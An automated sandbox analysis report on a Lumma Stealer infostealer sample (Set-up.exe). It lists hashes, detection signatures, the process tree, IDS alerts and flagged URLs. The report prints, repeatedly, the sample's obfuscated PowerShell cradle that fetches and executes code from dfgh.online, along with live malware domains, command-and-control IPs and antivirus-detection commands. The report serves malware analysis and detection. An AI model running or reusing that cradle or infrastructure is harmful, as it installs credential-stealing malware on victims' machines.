Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1582492
MD5: b92ee6aff573d5f6aec1cfd748fe3ccb
SHA1: 203fd74f67e7013de56b3dc56e44d816437cc960
SHA256: ba34710ae9f0fe471ded943e84a8dbce2ad241fe550dc3e4e66a5062a978058c
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Set-up.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: B92EE6AFF573D5F6AEC1CFD748FE3CCB)
    • powershell.exe (PID: 3868 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9ONHJ3I0NWFBK4Q0S62.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • 9ONHJ3I0NWFBK4Q0S62.tmp (PID: 6208 cmdline: "C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • 9ONHJ3I0NWFBK4Q0S62.exe (PID: 5692 cmdline: "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • 9ONHJ3I0NWFBK4Q0S62.tmp (PID: 6784 cmdline: "C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 1096 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 3288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6036 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1248 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5788 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4296 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5856 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5688 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5960 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6252 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6444 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5084 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6324 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5436 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3732 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3528 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 428 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2452 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5808 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4cc0b:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2173757711.00000000007E5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 2164, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x, ProcessId: 3868, ProcessName: powershell.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:09.982569+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:10.947979+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:12.094144+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:13.209295+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:14.463172+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:16.217302+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:17.263003+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:18.312302+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:19.512924+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49718 | 185.161.251.21 | 443 | TCP
              2024-12-30T18:13:20.773091+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49720 | 104.21.37.128 | 443 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:10.457108+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:11.455753+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
              2024-12-30T18:13:18.762335+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:10.457108+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:11.455753+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:21.179793+0100 | 2008438 | 1 | A Network Trojan was detected | 104.21.37.128 | 443 | 192.168.2.5 | 49720 | TCP
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-30T18:13:16.674403+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP

              AV Detection

              Source: https://klipvumisui.shop/Lm | Avira URL Cloud: Label: malware
              Source: https://cegu.shop:443/8574262446/ph.txt | Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtt | Avira URL Cloud: Label: malware
              Source: https://laborersquei.click/api. | Avira URL Cloud: Label: malware
              Source: https://laborersquei.click/api | Avira URL Cloud: Label: malware
              Source: https://cegu.shop/Tj | Avira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe | ReversingLabs: Detection: 39%
              Source: Submited Sample | Integrated Neural Analysis Model: Matched 87.7% probability
              Source: Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_0040A326 __EH_prolog,FindFirstFileA,FindFirstFileW,FindFirstFileW,FindFirstFileW,0_2_0040A326
              Source: C:\Users\user\Desktop\Set-up.exe | Code function: 0_2_0040A911 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,0_2_0040A911
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+02h]0_2_006A3F1E

              Networking

              Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Joe Sandbox View | IP Address: 188.114.96.3
              Source: Joe Sandbox View | IP Address: 185.161.251.21
              Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
